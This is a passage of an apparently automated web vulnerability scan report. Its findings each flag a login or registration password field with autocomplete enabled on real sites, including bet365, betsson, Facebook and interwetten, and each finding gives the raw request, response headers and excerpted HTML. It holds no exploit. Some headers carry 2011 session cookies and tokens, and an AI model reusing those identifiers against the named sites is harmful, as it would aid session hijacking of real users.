ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.111. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The page contains a form with the following action URL: /extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/horse-racing/best-odds-guaranteed HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:26 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5fxxsc45xzcdzr55sixclp45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/horse-racing/best-odds-guaranteed/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.112. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/bore-draw-money-back

Issue detail

The page contains a form with the following action URL: /extra/en/promotions/soccer/bore-draw-money-back/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/soccer/bore-draw-money-back HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fufizjajowzlfy45sho150nb; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 98594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/bore-draw-money-back/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.113. http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/soccer-accumulator-bonus

Issue detail

The page contains a form with the following action URL: /extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx

The form contains the following password field with autocomplete enabled: ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/promotions/soccer/soccer-accumulator-bonus HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tv4wgmvkxivljf55azj5ogae; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 113999


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/promotions/soccer/soccer-accumulator-bonus/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword&quot;, 2);" OnFocus="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour(&quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword&quot;, &quot;ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword&quot;, 1);" /></div>
...[SNIP]...

13.114. https://www.betsson.com/start/en/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/en/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients

The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /start/en/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=8a90f1f5-60b8-4531-a685-5a21012f097f; expires=Mon, 23-May-2011 12:08:53 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:52 GMT
Connection: close
Content-Length: 42417
Set-Cookie: BIGipServerwww.betsson.com=699339180.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.115. https://www.betsson.com/start/is/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /start/is/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients

The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /start/is/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: core.startpage.viewedprofile=prio=0&id=5c75486e-ebd0-4a87-89b5-5bff99e69097; expires=Mon, 23-May-2011 12:08:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 16 May 2011 12:08:50 GMT
Connection: close
Content-Length: 39256
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.116. https://www.betsson.com/web/en/sportsbook/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /web/en/sportsbook/

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients

The form contains the following password field with autocomplete enabled: tbPassword

Request

GET /web/en/sportsbook/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 78630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=hrdmunq10h1upatzji4snpvl; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-UA-Compatible: IE=EmulateIE8
Date: Mon, 16 May 2011 12:08:59 GMT
Connection: close
Set-Cookie: BIGipServerwww.betsson.com=682561964.20480.0000; path=/
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.117. http://www.crazyrewards.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.crazyrewards.com
Path:   /

Issue detail

The page contains a form with the following action URL: http://partners.crazyrewards.com/login.asp

The form contains the following password field with autocomplete enabled: password

Request

GET / HTTP/1.1
Host: www.crazyrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 15 Mar 2011 14:28:31 GMT
Accept-Ranges: bytes
ETag: "c0c41421de3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:05 GMT
Connection: close
Content-Length: 11218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta name="robots" con
...[SNIP]...
<div id="loginbox">
       <form method="post" action="http://partners.crazyrewards.com/login.asp" id="form1" name="form1" target="_blank">
       <table border="0" width="266" >
...[SNIP]...
<input class="input-login" type="text" name="username" value="username" onfocus="if(this.value=='username')this.value='';"/>
   <input class="input-login" type="password" name="password" value="password" onfocus="if(this.value=='password')this.value='';"/>
</td>
...[SNIP]...

13.118. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL: https://www.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled: pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.119. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled: reg_passwd__

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

13.120. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled: reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="0c8389686ea405c1f0d6cb61733a30bf" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

13.121. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.122. http://www.facebook.com/WinningsCom

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.123. http://www.facebook.com/crazyscratch

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crazyscratch

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.124. http://www.facebook.com/peoplespostcodelottery

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /peoplespostcodelottery

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

13.125. http://www.heavenaffiliates.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.heavenaffiliates.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.heavenaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:02:32 GMT
Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.heavenaffiliates.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> He
...[SNIP]...
</h2>
                       <form action="http://affiliates.heavenaffiliates.com/login_cust.asp" method="post">
                           <fieldset>
...[SNIP]...
</label>
                                   <input type="password" name="password" class="input" />
                               </p>
...[SNIP]...

13.126. https://www.interwetten.com/Header-Contact

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /Header-Contact

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /Header-Contact HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:43:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:43:58 GMT
Connection: close
